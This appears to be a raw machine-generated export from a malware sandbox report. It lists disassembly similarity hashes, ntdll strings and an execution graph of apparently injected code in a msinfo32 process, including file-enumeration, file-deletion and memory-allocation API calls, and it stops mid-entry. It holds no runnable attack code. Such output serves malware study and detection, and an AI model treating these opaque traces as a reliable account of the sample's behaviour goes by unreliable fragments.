                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f9fd13e7f59d0e3896147efc2124b4cb4270196d2b776389c51946ba8478d7ce
                                                                                                        • Instruction ID: afad14760e3898a9f421a59581f106d356599dccab92e5f5b75177fd2b18b63b
                                                                                                        • Opcode Fuzzy Hash: f9fd13e7f59d0e3896147efc2124b4cb4270196d2b776389c51946ba8478d7ce
                                                                                                        • Instruction Fuzzy Hash: 5E90023524541802D241715844046064029A7D0241F95C022E0424564EC6558B56AB63
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbad6528cde065d7f95b79fa367908552f7b1d462d6b3f07f16111107fd3de5c
                                                                                                        • Instruction ID: 42d27c82410e6a42092bafae1d49bb70eecadf7e38774b039bca0ff3c3ec1ed5
                                                                                                        • Opcode Fuzzy Hash: dbad6528cde065d7f95b79fa367908552f7b1d462d6b3f07f16111107fd3de5c
                                                                                                        • Instruction Fuzzy Hash: AC90023520541C42D20071584404B46402597E0301F55C026E0124664DC615CA517623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5b0bb0acc2e71662fcf26e902c9578b6cedc25a07f4e3730881c95a651868011
                                                                                                        • Instruction ID: 1d2b4b494ec14394cbd665a45f4e5d4b1cc6846d77ea34e67dbaa2224ea32a29
                                                                                                        • Opcode Fuzzy Hash: 5b0bb0acc2e71662fcf26e902c9578b6cedc25a07f4e3730881c95a651868011
                                                                                                        • Instruction Fuzzy Hash: 0D90023520541803D20071585508707402597D0201F55D421E0424568DD6568A516223
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 763c3cae76f910689797a1faaaa7a47eab43395c1f7fca401a761abdbae05faa
                                                                                                        • Instruction ID: 57665e36d3e35c43c9dae6d264e457c52c466fdcd3d05d3004b2c87f72330786
                                                                                                        • Opcode Fuzzy Hash: 763c3cae76f910689797a1faaaa7a47eab43395c1f7fca401a761abdbae05faa
                                                                                                        • Instruction Fuzzy Hash: B190022560941802D24071585418706403597D0201F55D021E0024564DC6598B5567A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5ef5a747c0856876ff12022b1fc75b3d8e91d4b0617f13d53436d77f6e1ca5e7
                                                                                                        • Instruction ID: ecb50a1cd38f8495cbc5110ab8ab3c242a18ac5fb004f8814925174377b75f9b
                                                                                                        • Opcode Fuzzy Hash: 5ef5a747c0856876ff12022b1fc75b3d8e91d4b0617f13d53436d77f6e1ca5e7
                                                                                                        • Instruction Fuzzy Hash: DB90023520541802D20075985408646402597E0301F55D021E5024565EC6658A916233
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c9ab123fc572678bab0a05120a8ebf242adc2b4fc83df47f9d0aed81e5b9a08e
                                                                                                        • Instruction ID: abdf1ee623205da83ac80fad1522007b5aaea5c927c58e8b6d32bb4348bc8e49
                                                                                                        • Opcode Fuzzy Hash: c9ab123fc572678bab0a05120a8ebf242adc2b4fc83df47f9d0aed81e5b9a08e
                                                                                                        • Instruction Fuzzy Hash: 1090026521541442D20471584404706406597E1201F55C022E2154564CC5298E615227
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c7307d23d24a95adc396571c21d325cec40821d7865732c7e94c74cde592904b
                                                                                                        • Instruction ID: 4aabd9fdff250f4805a1de410eb155064d42f3005ed0e45972cb367193d9a0ec
                                                                                                        • Opcode Fuzzy Hash: c7307d23d24a95adc396571c21d325cec40821d7865732c7e94c74cde592904b
                                                                                                        • Instruction Fuzzy Hash: F190026534541842D20071584414B064025D7E1301F55C025E1064564DC619CE526227
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 38e23a022c8db4cf7f047d5cc06ffa07c631acfcc1081fd2260833950d414f6f
                                                                                                        • Instruction ID: 70d7fc91e2ea36826731250ba35439a9975ddbe2f2ab65fd24c3a4ba07da3b9c
                                                                                                        • Opcode Fuzzy Hash: 38e23a022c8db4cf7f047d5cc06ffa07c631acfcc1081fd2260833950d414f6f
                                                                                                        • Instruction Fuzzy Hash: 00900225215C1442D30075684C14B07402597D0303F55C125E0154564CC9158A615623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3d4606e068fbeb50c51fa6d0c7fb224084f590a3df2a8e23f4ca44550a8fe410
                                                                                                        • Instruction ID: 10ee1cdd306dd6d1e335201530c8fc77a6b3c0f33f4658e053e166e4d8ae57ef
                                                                                                        • Opcode Fuzzy Hash: 3d4606e068fbeb50c51fa6d0c7fb224084f590a3df2a8e23f4ca44550a8fe410
                                                                                                        • Instruction Fuzzy Hash: 86900225605414424240716888449068025BBE1211755C131E0998560DC5598A655767
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7bde6377986e73fb06dc28b29d13d919d081642261ff342592906e0623f14e04
                                                                                                        • Instruction ID: 301555cdd3405cb76eb17224228d9a7a8be48c666a91d7ba96419aa06cef8dfc
                                                                                                        • Opcode Fuzzy Hash: 7bde6377986e73fb06dc28b29d13d919d081642261ff342592906e0623f14e04
                                                                                                        • Instruction Fuzzy Hash: ED90023520581802D20071584808747402597D0302F55C021E5164565EC665CA916633
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e4eed06e53e36fba5bd21176205ce15698b0d25fd5a23b8f9970df00f4fb91c6
                                                                                                        • Instruction ID: adcb4893144d5c43a5569041850af221bd19e3269f3fb7f7ee952137dac14846
                                                                                                        • Opcode Fuzzy Hash: e4eed06e53e36fba5bd21176205ce15698b0d25fd5a23b8f9970df00f4fb91c6
                                                                                                        • Instruction Fuzzy Hash: 0490023520581802D2007158481470B402597D0302F55C021E1164565DC6258A516673
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e0c04e715de7706ca616a87f9d60eaedacebaa9ab8a43935cad46330df6610cb
                                                                                                        • Instruction ID: 8a3dca5864be92e5f4f7a2db2aa795c2fcee9a3f4f208686da70a23431a9c40f
                                                                                                        • Opcode Fuzzy Hash: e0c04e715de7706ca616a87f9d60eaedacebaa9ab8a43935cad46330df6610cb
                                                                                                        • Instruction Fuzzy Hash: B490022530541802D202715844146064029D7D1345F95C022E1424565DC6258B53A233
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f93b57f4db76a579495e51c0a29b98bb7f126ea2e2e3efa215598058ed07c297
                                                                                                        • Instruction ID: b25300b61730eb209adb4d59d70432946cd52e2adc09253ddeaecc94767c2508
                                                                                                        • Opcode Fuzzy Hash: f93b57f4db76a579495e51c0a29b98bb7f126ea2e2e3efa215598058ed07c297
                                                                                                        • Instruction Fuzzy Hash: FE90026520581803D24075584804607402597D0302F55C021E2064565ECA298E516237
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7b51f1bcea160323d9fd645ea22588ed2c1740b91c0c826943534fc667c24783
                                                                                                        • Instruction ID: 4a64ec9fc436dbbbdc80c285728ec7eaf26b25feb0808e9c7c7f74ef4ba85adc
                                                                                                        • Opcode Fuzzy Hash: 7b51f1bcea160323d9fd645ea22588ed2c1740b91c0c826943534fc667c24783
                                                                                                        • Instruction Fuzzy Hash: A690027520541802D24071584404746402597D0301F55C021E5064564EC6598FD56767
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        Strings
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017F4742
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 017F4787
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017F4725
                                                                                                        • Execute=1, xrefs: 017F4713
                                                                                                        • ExecuteOptions, xrefs: 017F46A0
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017F46FC
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017F4655
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 017F7B8E
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 017F7B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 017F7BAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017F728C
                                                                                                        Strings
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017F7294
                                                                                                        • RTL: Resource at %p, xrefs: 017F72A3
                                                                                                        • RTL: Re-Waiting, xrefs: 017F72C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        APIs
                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0180CFBD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallFilterFunc@8
                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                        • API String ID: 4062629308-2383119779

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.1%
                                                                                                        Dynamic/Decrypted Code Coverage:4.2%
                                                                                                        Signature Coverage:1.5%
                                                                                                        Total number of Nodes:453
                                                                                                        Total number of Limit Nodes:75
81997->81999 81998 2eb85c0 LdrInitializeThunk 82000 2eb25ea 81998->82000 81999->81997 82000->81997 82000->81998 82002 2eb862d 82001->82002 82003 2eb864e SetErrorMode 82002->82003 82004 2eb8655 82002->82004 82003->82004 82004->81987 82006 2ecb9b0 NtAllocateVirtualMemory 82005->82006 82007 2ec1631 82006->82007 82007->81991 82009 2eccaf6 82008->82009 82010 2eccaf0 82008->82010 82011 2ecbb20 RtlAllocateHeap 82009->82011 82010->81990 82012 2eccb1c 82011->82012 82012->81990 82014 2eb0d39 82013->82014 82017 2ec9be0 82014->82017 82018 2ec9bfd 82017->82018 82021 4e82c70 LdrInitializeThunk 82018->82021 82019 2eb0d42 82019->82000 82021->82019 82022 2ebb210 82027 2ebaf20 82022->82027 82024 2ebb21d 82041 2ebaba0 82024->82041 82026 2ebb239 82028 2ebaf45 82027->82028 82052 2eb8830 82028->82052 82031 2ebb090 82031->82024 82033 2ebb0a7 82033->82024 82034 2ebb09e 82034->82033 82036 2ebb195 82034->82036 82071 2eba5f0 82034->82071 82038 2ebb1fa 82036->82038 82080 2eba960 82036->82080 82039 2ecba40 RtlFreeHeap 82038->82039 82040 2ebb201 82039->82040 82040->82024 82042 2ebabb6 82041->82042 82045 2ebabc1 82041->82045 82043 2ecbb20 RtlAllocateHeap 82042->82043 82043->82045 82044 2ebabe2 82044->82026 82045->82044 82046 2eb8830 GetFileAttributesW 82045->82046 82047 2ebaef5 82045->82047 82050 2eba5f0 RtlFreeHeap 82045->82050 82051 2eba960 RtlFreeHeap 82045->82051 82046->82045 82048 2ebaf0e 82047->82048 82049 2ecba40 RtlFreeHeap 82047->82049 82048->82026 82049->82048 82050->82045 82051->82045 82053 2eb8851 82052->82053 82054 2eb8858 GetFileAttributesW 82053->82054 82055 2eb8863 82053->82055 82054->82055 82055->82031 82056 2ec3810 82055->82056 82057 2ec381e 82056->82057 82058 2ec3825 82056->82058 82057->82034 82059 2eb4a30 LdrLoadDll 82058->82059 82060 2ec385a 82059->82060 82061 2ec3869 82060->82061 82084 2ec32d0 LdrLoadDll 82060->82084 82063 2ecbb20 RtlAllocateHeap 82061->82063 82067 2ec3a14 82061->82067 82064 2ec3882 82063->82064 82065 2ec3a0a 82064->82065 82064->82067 82068 2ec389e 
82064->82068 82066 2ecba40 RtlFreeHeap 82065->82066 82065->82067 82066->82067 82067->82034 82068->82067 82069 2ecba40 RtlFreeHeap 82068->82069 82070 2ec39fe 82069->82070 82070->82034 82072 2eba616 82071->82072 82085 2ebe020 82072->82085 82074 2eba688 82076 2eba810 82074->82076 82078 2eba6a6 82074->82078 82075 2eba7f5 82075->82034 82076->82075 82077 2eba4b0 RtlFreeHeap 82076->82077 82077->82076 82078->82075 82090 2eba4b0 82078->82090 82081 2eba986 82080->82081 82082 2ebe020 RtlFreeHeap 82081->82082 82083 2ebaa0d 82082->82083 82083->82036 82084->82061 82087 2ebe044 82085->82087 82086 2ebe051 82086->82074 82087->82086 82088 2ecba40 RtlFreeHeap 82087->82088 82089 2ebe08e 82088->82089 82089->82074 82091 2eba4cd 82090->82091 82094 2ebe0a0 82091->82094 82093 2eba5d3 82093->82078 82095 2ebe0c4 82094->82095 82096 2ebe16e 82095->82096 82097 2ecba40 RtlFreeHeap 82095->82097 82096->82093 82097->82096 82098 2ec97d0 82099 2ec9874 82098->82099 82101 2ec97fb 82098->82101 82100 2ec988a NtReadFile 82099->82100

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2$C$"$'$'$)G$*z$+$+T$2$8$8c$9X$:$=I$@d+T$@v$M$Q:$Q:$TY$V1$Xh$Yn$_3$c'$el$i-$m$q$qc$x!$R$X$f
                                                                                                        • API String ID: 0-2129657031
                                                                                                        • Opcode ID: 108565699d01c33926b3b917b270382420b98e6dfb69b2be1cba35ec1ccb81b7
                                                                                                        • Instruction ID: f6931fffdcda75e4fb5cc9518de4418778da51005f925083438696c8de13fdd8
                                                                                                        • Opcode Fuzzy Hash: 108565699d01c33926b3b917b270382420b98e6dfb69b2be1cba35ec1ccb81b7
                                                                                                        • Instruction Fuzzy Hash: 003281B0D45228CBEB24CF85C9A47DDBBB2BB45308F1091DAD5097B380C7B96A89CF54
                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02EBCB94
                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02EBCBCF
                                                                                                        • FindClose.KERNELBASE(?), ref: 02EBCBDA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: 71de5c7a3fffa2e830678768d777909897c705427e3925ffad69ae1480e16b89
                                                                                                        • Instruction ID: eb7109c283d7932da4c0c94123dfe375bc5908d2ac2f19b3701cd3300c9574d0
                                                                                                        • Opcode Fuzzy Hash: 71de5c7a3fffa2e830678768d777909897c705427e3925ffad69ae1480e16b89
                                                                                                        • Instruction Fuzzy Hash: 2C3196715803487FDB21DB64CC85FEF777D9F44708F20945DBA48AB180DB70AA858BA0
                                                                                                        APIs
                                                                                                        • NtCreateFile.NTDLL(?,CC4F3AA0,?,?,?,?,?,?,?,?,?), ref: 02EC975E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: dcc19046a45c2933493b84679adabaea5439e4c42be96d416aadabb5cd52c5cf
                                                                                                        • Instruction ID: c6e80855170e06ac95bd8dddbd767fff59e4c5a8792088da9a2c8bd4dcfb3867
                                                                                                        • Opcode Fuzzy Hash: dcc19046a45c2933493b84679adabaea5439e4c42be96d416aadabb5cd52c5cf
                                                                                                        • Instruction Fuzzy Hash: C231B5B5A01208AFDB14DF99D891EEEB7B9EF8C314F108219F919A7340D770A911CBA5
                                                                                                        APIs
                                                                                                        • NtReadFile.NTDLL(?,CC4F3AA0,?,?,?,?,?,?,?), ref: 02EC98B3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 0d4bf3b4a3e5cce63f76b9c5549e5ad54fbeb027fe2f0c70a33013416f466071
                                                                                                        • Instruction ID: b6f80aa5a721641a288daba14467f67fcd0a1aa6dda7ddd1526b39da01cd9c9e
                                                                                                        • Opcode Fuzzy Hash: 0d4bf3b4a3e5cce63f76b9c5549e5ad54fbeb027fe2f0c70a33013416f466071
                                                                                                        • Instruction Fuzzy Hash: E131C975A00208AFDB14DF99D881EEFB7B9EF88314F108219F919A7340D770A911CFA5
                                                                                                        APIs
                                                                                                        • NtAllocateVirtualMemory.NTDLL(02EB227E,CC4F3AA0,02EC843E,00000000,00000004,00003000,?,?,?,?,?,02EC843E,02EB227E,02EC843E,8FE85657,02EB227E), ref: 02EC9B85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167126740-0
                                                                                                        • Opcode ID: fb8b4c81b67e4da6d1238c1eeabe7fed388438486c0fb2f5ae59a534951c3a67
                                                                                                        • Instruction ID: 4dc42bb5d76e40962779a69300bbf82b182dfccbc50d91bcb7166e1b3fd5b3ca
                                                                                                        • Opcode Fuzzy Hash: fb8b4c81b67e4da6d1238c1eeabe7fed388438486c0fb2f5ae59a534951c3a67
                                                                                                        • Instruction Fuzzy Hash: FF2119B5A40209AFDB14DF98DC41FAFB7B9EF88700F10811DF918A7240D770A9128BA5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 4033686569-0
                                                                                                        • Opcode ID: e465f5b7993ed442ba0cf7bda70828c2a595861c945c1c01b649800edf57c338
                                                                                                        • Instruction ID: 18ff8752f86e5b46836d41f966def5bbb59d31e25199691c07218c21fdc6304e
                                                                                                        • Opcode Fuzzy Hash: e465f5b7993ed442ba0cf7bda70828c2a595861c945c1c01b649800edf57c338
                                                                                                        • Instruction Fuzzy Hash: FE1191316402046EDA20EBA8DC51FAB776DEF85714F108109F948AB280D7B07502CBA5
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02EC9994
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_2ea0000_msinfo32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 1a3ac9ed52abc80fff84237a99ff0edf4a748cc7e4aaa16ecd6c3ba37d3716ea
                                                                                                        • Instruction ID: 9a199a0473b624aa08a1acc085f549c5e4f098c6c2c3e8c1bddd5052cb71670b
                                                                                                        • Opcode Fuzzy Hash: 1a3ac9ed52abc80fff84237a99ff0edf4a748cc7e4aaa16ecd6c3ba37d3716ea
